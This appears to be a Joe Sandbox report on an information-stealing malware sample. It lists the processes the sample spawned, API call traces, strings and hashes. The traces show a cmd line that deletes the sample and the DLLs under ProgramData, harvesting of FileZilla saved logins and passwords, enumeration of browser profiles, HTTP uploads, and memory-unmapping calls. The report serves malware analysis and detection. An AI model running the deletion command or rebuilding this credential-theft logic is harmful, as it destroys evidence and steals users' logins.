00000000.00000002.2243998143.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:02:16
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\jlO7971vUz.exe" & del "C:\ProgramData\*.dll"" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:02:16
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:02:17
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 5
Imagebase:	0x370000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	79.2%
Signature Coverage:	12.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	49

Executed Functions

Function 017F7A60 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,013BC828), ref: 017F7A7D
GetProcAddress.KERNEL32(75900000,013BC6E8), ref: 017F7A95
GetProcAddress.KERNEL32(75900000,013B2898), ref: 017F7AAE
GetProcAddress.KERNEL32(75900000,013B2700), ref: 017F7AC6
GetProcAddress.KERNEL32(75900000,013B27A8), ref: 017F7ADE
GetProcAddress.KERNEL32(75900000,013B27C0), ref: 017F7AF7
GetProcAddress.KERNEL32(75900000,013BB3E8), ref: 017F7B0F
GetProcAddress.KERNEL32(75900000,013B27F0), ref: 017F7B27
GetProcAddress.KERNEL32(75900000,013B2868), ref: 017F7B40
GetProcAddress.KERNEL32(75900000,013B2A60), ref: 017F7B58
GetProcAddress.KERNEL32(75900000,013B29A0), ref: 017F7B70
GetProcAddress.KERNEL32(75900000,013BC9A8), ref: 017F7B89
GetProcAddress.KERNEL32(75900000,013BCA88), ref: 017F7BA1
GetProcAddress.KERNEL32(75900000,013BC748), ref: 017F7BB9
GetProcAddress.KERNEL32(75900000,013BC768), ref: 017F7BD2
GetProcAddress.KERNEL32(75900000,013B2A00), ref: 017F7BEA
GetProcAddress.KERNEL32(75900000,013B29B8), ref: 017F7C02
GetProcAddress.KERNEL32(75900000,013BB4D8), ref: 017F7C1B
GetProcAddress.KERNEL32(75900000,013BC848), ref: 017F7C33
GetProcAddress.KERNEL32(75900000,013B29D0), ref: 017F7C4B
GetProcAddress.KERNEL32(75900000,013B2A18), ref: 017F7C64
GetProcAddress.KERNEL32(75900000,013B2A48), ref: 017F7C7C
GetProcAddress.KERNEL32(75900000,013B29E8), ref: 017F7C94
GetProcAddress.KERNEL32(75900000,013BC868), ref: 017F7CAD
GetProcAddress.KERNEL32(75900000,013B2A30), ref: 017F7CC5
GetProcAddress.KERNEL32(75900000,013C00B0), ref: 017F7CDD
GetProcAddress.KERNEL32(75900000,013C0068), ref: 017F7CF6
GetProcAddress.KERNEL32(75900000,013C0080), ref: 017F7D0E
GetProcAddress.KERNEL32(75900000,013BFF30), ref: 017F7D26
GetProcAddress.KERNEL32(75900000,013C0110), ref: 017F7D3F
GetProcAddress.KERNEL32(75900000,013BFF18), ref: 017F7D57
GetProcAddress.KERNEL32(75900000,013BFF90), ref: 017F7D6F
GetProcAddress.KERNEL32(75900000,013C01E8), ref: 017F7D88
GetProcAddress.KERNEL32(75900000,013B5EC8), ref: 017F7DA0
GetProcAddress.KERNEL32(75900000,013C0170), ref: 017F7DB8
GetProcAddress.KERNEL32(75900000,013BFF78), ref: 017F7DD1
GetProcAddress.KERNEL32(75900000,013BC9C8), ref: 017F7DE9
GetProcAddress.KERNEL32(75900000,013BFF60), ref: 017F7E01
GetProcAddress.KERNEL32(75900000,013BC928), ref: 017F7E1A
GetProcAddress.KERNEL32(75900000,013C0188), ref: 017F7E32
GetProcAddress.KERNEL32(75900000,013C0038), ref: 017F7E4A
GetProcAddress.KERNEL32(75900000,013BC948), ref: 017F7E63
GetProcAddress.KERNEL32(75900000,013BCA08), ref: 017F7E7B
LoadLibraryA.KERNEL32(013BFFA8,?,017F3E9C,?,00000030,00000064,017F4530,?,0000002C,00000064,017F44D0,?,00000030,00000064,Function_000143C0,?), ref: 017F7E8D
LoadLibraryA.KERNEL32(013C0128,?,017F3E9C,?,00000030,00000064,017F4530,?,0000002C,00000064,017F44D0,?,00000030,00000064,Function_000143C0,?), ref: 017F7E9E
LoadLibraryA.KERNEL32(013BFFC0,?,017F3E9C,?,00000030,00000064,017F4530,?,0000002C,00000064,017F44D0,?,00000030,00000064,Function_000143C0,?), ref: 017F7EB0
LoadLibraryA.KERNEL32(013C0140,?,017F3E9C,?,00000030,00000064,017F4530,?,0000002C,00000064,017F44D0,?,00000030,00000064,Function_000143C0,?), ref: 017F7EC2
LoadLibraryA.KERNEL32(013C01A0,?,017F3E9C,?,00000030,00000064,017F4530,?,0000002C,00000064,017F44D0,?,00000030,00000064,Function_000143C0,?), ref: 017F7ED3
LoadLibraryA.KERNEL32(013C0098,?,017F3E9C,?,00000030,00000064,017F4530,?,0000002C,00000064,017F44D0,?,00000030,00000064,Function_000143C0,?), ref: 017F7EE5
LoadLibraryA.KERNEL32(013BFFF0,?,017F3E9C,?,00000030,00000064,017F4530,?,0000002C,00000064,017F44D0,?,00000030,00000064,Function_000143C0,?), ref: 017F7EF7
LoadLibraryA.KERNEL32(013C00E0,?,017F3E9C,?,00000030,00000064,017F4530,?,0000002C,00000064,017F44D0,?,00000030,00000064,Function_000143C0,?), ref: 017F7F08
GetProcAddress.KERNEL32(75FD0000,013BCC08), ref: 017F7F2A
GetProcAddress.KERNEL32(75FD0000,013BFFD8), ref: 017F7F42
GetProcAddress.KERNEL32(75FD0000,013BE7A8), ref: 017F7F5A
GetProcAddress.KERNEL32(75FD0000,013C0008), ref: 017F7F73
GetProcAddress.KERNEL32(75FD0000,013BCB68), ref: 017F7F8B
GetProcAddress.KERNEL32(73430000,013BB488), ref: 017F7FB0
GetProcAddress.KERNEL32(73430000,013BCAE8), ref: 017F7FC9
GetProcAddress.KERNEL32(73430000,013BB528), ref: 017F7FE1
GetProcAddress.KERNEL32(73430000,013C00C8), ref: 017F7FF9
GetProcAddress.KERNEL32(73430000,013C0020), ref: 017F8012
GetProcAddress.KERNEL32(73430000,013BCB88), ref: 017F802A
GetProcAddress.KERNEL32(73430000,013BCC88), ref: 017F8042
GetProcAddress.KERNEL32(73430000,013C0050), ref: 017F805B
GetProcAddress.KERNEL32(763B0000,013BCE08), ref: 017F807C
GetProcAddress.KERNEL32(763B0000,013BCB48), ref: 017F8094
GetProcAddress.KERNEL32(763B0000,013C00F8), ref: 017F80AD
GetProcAddress.KERNEL32(763B0000,013BFF48), ref: 017F80C5
GetProcAddress.KERNEL32(763B0000,013BCD28), ref: 017F80DD
GetProcAddress.KERNEL32(750F0000,013BB758), ref: 017F8103
GetProcAddress.KERNEL32(750F0000,013BB708), ref: 017F811B
GetProcAddress.KERNEL32(750F0000,013C0158), ref: 017F8133
GetProcAddress.KERNEL32(750F0000,013BCCE8), ref: 017F814C
GetProcAddress.KERNEL32(750F0000,013BCD08), ref: 017F8164
GetProcAddress.KERNEL32(750F0000,013BB618), ref: 017F817C
GetProcAddress.KERNEL32(75A50000,013C01B8), ref: 017F81A2
GetProcAddress.KERNEL32(75A50000,013BCD48), ref: 017F81BA
GetProcAddress.KERNEL32(75A50000,013BE718), ref: 017F81D2
GetProcAddress.KERNEL32(75A50000,013C01D0), ref: 017F81EB
GetProcAddress.KERNEL32(75A50000,013C0200), ref: 017F8203
GetProcAddress.KERNEL32(75A50000,013BCDC8), ref: 017F821B
GetProcAddress.KERNEL32(75A50000,013BCCC8), ref: 017F8234
GetProcAddress.KERNEL32(75A50000,013C0248), ref: 017F824C
GetProcAddress.KERNEL32(75A50000,013C0260), ref: 017F8264
GetProcAddress.KERNEL32(75070000,013BCE28), ref: 017F8286
GetProcAddress.KERNEL32(75070000,013C0278), ref: 017F829E
GetProcAddress.KERNEL32(75070000,013C02D8), ref: 017F82B6
GetProcAddress.KERNEL32(75070000,013C0230), ref: 017F82CF
GetProcAddress.KERNEL32(75070000,013C0218), ref: 017F82E7
GetProcAddress.KERNEL32(74E50000,013BCBA8), ref: 017F8308
GetProcAddress.KERNEL32(74E50000,013BCBC8), ref: 017F8321
GetProcAddress.KERNEL32(75320000,013BCE48), ref: 017F8342
GetProcAddress.KERNEL32(75320000,013C0290), ref: 017F835A
GetProcAddress.KERNEL32(6F080000,013BCBE8), ref: 017F8380
GetProcAddress.KERNEL32(6F080000,013BCE68), ref: 017F8398
GetProcAddress.KERNEL32(6F080000,013BCD68), ref: 017F83B0
GetProcAddress.KERNEL32(6F080000,013C02C0), ref: 017F83C9
GetProcAddress.KERNEL32(6F080000,013BCDA8), ref: 017F83E1
GetProcAddress.KERNEL32(6F080000,013BCAC8), ref: 017F83F9
GetProcAddress.KERNEL32(6F080000,013BCC28), ref: 017F8412
GetProcAddress.KERNEL32(6F080000,013BCD88), ref: 017F842A
GetProcAddress.KERNEL32(74E00000,013C02A8), ref: 017F844B
GetProcAddress.KERNEL32(74E00000,013BE788), ref: 017F8464
GetProcAddress.KERNEL32(74E00000,013C0818), ref: 017F847C
GetProcAddress.KERNEL32(74E00000,013C0830), ref: 017F8494
GetProcAddress.KERNEL32(74DF0000,013BCDE8), ref: 017F84B6
GetProcAddress.KERNEL32(6CE30000,013C0848), ref: 017F84D7
GetProcAddress.KERNEL32(6CE30000,013BCC48), ref: 017F84EF
GetProcAddress.KERNEL32(6CE30000,013C0860), ref: 017F8508
GetProcAddress.KERNEL32(6CE30000,013C08C0), ref: 017F8520

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: cee4eb8df6d59c34c9fb11b966dbb5f5a38b4fa6a61aa28b1e90c06cb3581d39
Instruction ID: 02832a3e256a874dc3c52f4c0a7eb6e6dba1c11f8a117dafcb3d23d890c3f8f9
Opcode Fuzzy Hash: cee4eb8df6d59c34c9fb11b966dbb5f5a38b4fa6a61aa28b1e90c06cb3581d39
Instruction Fuzzy Hash: DB6271BDD10600AFC776DFA8F5889563BB9BB4C365710861DA609C324CDB79A893CF21

Function 017EF920 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 017F6D1B

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Part of subcall function 017E93C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 017E93EC
Part of subcall function 017E93C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 017E9411
Part of subcall function 017E93C0: LocalAlloc.KERNEL32(00000040,?), ref: 017E9431
Part of subcall function 017E93C0: ReadFile.KERNEL32(000000FF,?,00000000,017EF9B7,00000000), ref: 017E945A
Part of subcall function 017E93C0: LocalFree.KERNEL32(017EF9B7), ref: 017E9490
Part of subcall function 017E93C0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 017E949A

Part of subcall function 017F6D40: LocalAlloc.KERNEL32(00000040,-00000001), ref: 017F6D62

strtok_s.MSVCRT ref: 017EF9EB
GetProcessHeap.KERNEL32(00000000,000F423F,017FE792,017FE78F,017FE78E,017FE78B), ref: 017EFA32
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,017FE78A), ref: 017EFA39
StrStrA.SHLWAPI(00000000,<Host>), ref: 017EFA55
lstrlen.KERNEL32(00000000), ref: 017EFA63

Part of subcall function 017F67B0: malloc.MSVCRT ref: 017F67B8
Part of subcall function 017F67B0: strncpy.MSVCRT ref: 017F67D3

StrStrA.SHLWAPI(00000000,<Port>), ref: 017EFA9F
lstrlen.KERNEL32(00000000), ref: 017EFAAD
StrStrA.SHLWAPI(00000000,<User>), ref: 017EFAE9
lstrlen.KERNEL32(00000000), ref: 017EFAF7
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 017EFB33
lstrlen.KERNEL32(00000000), ref: 017EFB45
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,017FE78A), ref: 017EFBD2
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 017EFBEA
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 017EFC02
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 017EFC1A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 017EFC32
lstrcat.KERNEL32(?,profile: null), ref: 017EFC41
lstrcat.KERNEL32(?,url: ), ref: 017EFC50
lstrcat.KERNEL32(?,00000000), ref: 017EFC63
lstrcat.KERNEL32(?,017FEEC8), ref: 017EFC72
lstrcat.KERNEL32(?,00000000), ref: 017EFC85
lstrcat.KERNEL32(?,017FEECC), ref: 017EFC94
lstrcat.KERNEL32(?,login: ), ref: 017EFCA3
lstrcat.KERNEL32(?,00000000), ref: 017EFCB6
lstrcat.KERNEL32(?,017FEED8), ref: 017EFCC5
lstrcat.KERNEL32(?,password: ), ref: 017EFCD4
lstrcat.KERNEL32(?,00000000), ref: 017EFCE7
lstrcat.KERNEL32(?,017FEEE8), ref: 017EFCF6
lstrcat.KERNEL32(?,017FEEEC), ref: 017EFD05
strtok_s.MSVCRT ref: 017EFD49
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,017FE78A), ref: 017EFD5E
memset.MSVCRT ref: 017EFDA7

Strings

<Pass encoding="base64">, xrefs: 017EFB2A
<Port>, xrefs: 017EFA96
url: , xrefs: 017EFC47
<User>, xrefs: 017EFAE0
password: , xrefs: 017EFCCB
login: , xrefs: 017EFC9A
profile: null, xrefs: 017EFC38
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 017EF974
<Host>, xrefs: 017EFA4C
browser: FileZilla, xrefs: 017EFC29

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: 52f98b4ef01fa5b8f052b6c2c1f5f5ec5ffa0adf2ff9dd9bbe8ae7f351d75823
Instruction ID: 1b71ab77328b2b40dbb6d00fd8ea49415e81505885db78032b59b8c6a71a2477
Opcode Fuzzy Hash: 52f98b4ef01fa5b8f052b6c2c1f5f5ec5ffa0adf2ff9dd9bbe8ae7f351d75823
Instruction Fuzzy Hash: 37D13E719501099BDF14EFE4DD59EEFF778AF28301F10841CE206A6298EF34AA45CB66

Function 017EB630 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

FindFirstFileA.KERNEL32(00000000,?,017FE50F,017FE50B,00000000,?,?,?,017FEC44,017FE50A), ref: 017EB6B5
StrCmpCA.SHLWAPI(?,017FEC48), ref: 017EB70D
StrCmpCA.SHLWAPI(?,017FEC4C), ref: 017EB723
FindNextFileA.KERNELBASE(000000FF,?), ref: 017EBF5E
FindClose.KERNEL32(000000FF), ref: 017EBF70

Strings

Google Chrome, xrefs: 017EBDDC
\Brave\Preferences, xrefs: 017EB99B
Brave, xrefs: 017EB8C2
Preferences, xrefs: 017EB8DE

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: f6c4f03b75974f21660fbdcb8507551934855550743817c639556b76dd2ed323
Instruction ID: 6c5dbe460058650047049f902116dbfab096df9aebfd9bcba44252b15e38e7a6
Opcode Fuzzy Hash: f6c4f03b75974f21660fbdcb8507551934855550743817c639556b76dd2ed323
Instruction Fuzzy Hash: F742F2729101099BCF14FB70DD9DEEFB779AF68300F50416CA60A97258EE349B49CB62

Function 6C4335A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C4BF688,00001000), ref: 6C4335D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4335E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C4335FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C43363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C43369F
__aulldiv.LIBCMT ref: 6C4336E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C433773
EnterCriticalSection.KERNEL32(6C4BF688), ref: 6C43377E
LeaveCriticalSection.KERNEL32(6C4BF688), ref: 6C4337BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C4337C4
EnterCriticalSection.KERNEL32(6C4BF688), ref: 6C4337CB
LeaveCriticalSection.KERNEL32(6C4BF688), ref: 6C433801
__aulldiv.LIBCMT ref: 6C433883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C433902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C433918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C43394C

Strings

GenuntelineI, xrefs: 6C433639
MOZ_TIMESTAMP_MODE, xrefs: 6C4335DB
AuthcAMDenti, xrefs: 6C433946
GTC, xrefs: 6C433912
QPC, xrefs: 6C4338FC

Memory Dump Source

Source File: 00000000.00000002.2271842523.000000006C431000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C430000, based on PE: true

Associated: 00000000.00000002.2271798919.000000006C430000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2272007569.000000006C4AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2272093046.000000006C4BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2272122694.000000006C4C2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c430000_jlO7971vUz.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 0ab863014e15e0bd20a11652760f9e29c1a0d51519b90e853d60053f45a35cb9
Instruction ID: feebfd54fe2c95585e6e53c715e462599b07894e84ed13a046992f3b046668f2
Opcode Fuzzy Hash: 0ab863014e15e0bd20a11652760f9e29c1a0d51519b90e853d60053f45a35cb9
Instruction Fuzzy Hash: 9FB19179B053119FEB08EF29C485F1A7BF5ABC9704F05892EE89DD3750D77098028B99

Function 017F3560 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 017F3579
FindFirstFileA.KERNEL32(?,?), ref: 017F3590
StrCmpCA.SHLWAPI(?,017FE8C4), ref: 017F35BE
StrCmpCA.SHLWAPI(?,017FE8C8), ref: 017F35D4
FindNextFileA.KERNEL32(000000FF,?), ref: 017F37A9
FindClose.KERNEL32(000000FF), ref: 017F37BE

Strings

%s\%s, xrefs: 017F363F
%s\*, xrefs: 017F356D
%s\%s, xrefs: 017F35EE

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 886060f81617147df414ec3867aca1649d7c7bccea19f6fd25cb4080ebd4b904
Instruction ID: 51485f84753b492c473e91ce500011a9024fac4b5717c94ea9baa05c4666e7bf
Opcode Fuzzy Hash: 886060f81617147df414ec3867aca1649d7c7bccea19f6fd25cb4080ebd4b904
Instruction Fuzzy Hash: 666156B5900219ABCB21EBA4DD59DEBB3BCBB58701F00859CF70A96144EB709B85CF91

Function 017E4560 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Part of subcall function 017E4490: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 017E4516
Part of subcall function 017E4490: InternetCrackUrlA.WININET(00000000,00000000), ref: 017E4526

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 017E45F5
StrCmpCA.SHLWAPI(?,013BE608), ref: 017E461A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 017E479A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,017FE7B2,00000000,?,?,00000000,?,",00000000,?,013BE668), ref: 017E4AC8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 017E4AE4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 017E4AF8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 017E4B29
InternetCloseHandle.WININET(00000000), ref: 017E4B8D
InternetCloseHandle.WININET(00000000), ref: 017E4BA5
HttpOpenRequestA.WININET(00000000,013BE648,?,013C2018,00000000,00000000,00400100,00000000), ref: 017E47F5

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

InternetCloseHandle.WININET(00000000), ref: 017E4BAF

Strings

------, xrefs: 017E4949
", xrefs: 017E48D2
", xrefs: 017E4A13
------, xrefs: 017E4808
------, xrefs: 017E469D

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 996eb3977f0850ff92ed61de48dfe9834e815d0fa8dd5e1dfe66c2d9977a6758
Instruction ID: d70f7f20a82dd28b1e39b022a2de2f40df28fe056413949cd4d39a12a6b6c0df
Opcode Fuzzy Hash: 996eb3977f0850ff92ed61de48dfe9834e815d0fa8dd5e1dfe66c2d9977a6758
Instruction Fuzzy Hash: F612DD72911119AACF15EFA0DC99FEFF378AF25300F10419DA20662695EF702B49CF66

Function 00B32690 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 214
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 00B32733
GetProcAddress.KERNEL32(00000000,?), ref: 00B32774
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00B3277B
GetProcAddress.KERNEL32(?,?), ref: 00B327B8
GetCurrentProcess.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 00B327D3
NtAllocateVirtualMemory.NTDLL(00000000), ref: 00B327DA
GetCurrentProcess.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 00B327FD

Strings

b, xrefs: 00B326E2
@WJL, xrefs: 00B3274B
'%83, xrefs: 00B32791

